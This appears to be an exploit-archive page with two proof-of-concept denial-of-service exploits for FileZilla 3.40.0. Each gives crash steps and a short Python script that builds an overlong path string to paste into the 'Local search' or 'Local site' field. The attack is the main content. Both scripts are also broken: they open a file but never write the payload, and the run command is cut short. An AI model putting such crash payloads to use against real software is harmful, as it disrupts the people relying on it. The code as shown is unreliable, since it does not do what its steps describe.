Filezilla 3.40.0 local search / local site denial of service (poc) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-04 | Type : dos | Platform : linux
This exploit / vulnerability Filezilla 3.40.0 local search / local site denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: FileZilla 3.40.0 - "Local search" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 20, 2019
# Vendor Homepage:
# Software Link :
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)

# Steps to Produce the Crash:
# 1.- Run python code : python
# 2.- Open buff.txt and copy content to clipboard
# 3.- Open Filezilla (located in bin folder), in top bar click on Binoculars icon (search for files recursively)
# 4.- In the opend window, Set Search type to "Local search"
# 5.- Paste ClipBoard on "Search directory" and click on "Search"
# 6.- Boom! Crashed...

#!/usr/bin/env python

buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("buff.txt", "w")

# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.

# Exploit Title: FileZilla 3.40.0 - "Local site" Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: February 25, 2019
# Vendor Homepage:
# Software Link :
# Tested Version: 3.40.0
# Tested on: Kali linux x86_64
# Vulnerability Type: Denial of Service (DoS)

# Steps to Produce the Crash:
# 1.- Run python code : python
# 2.- Open crash.txt and copy content to clipboard
# 3.- In "Local site" section paste clipboard and Enter.
# 4.- Boom! Crashed...

#!/usr/bin/env python

buffer = "\x41" * 384
crash = "/" + buffer + "BBBB" + "CCCC"
f = open("crash.txt", "w")

# Note: If you have not "/" before payload, you should add it to begining of payload, So the program recognizes it as a valid path.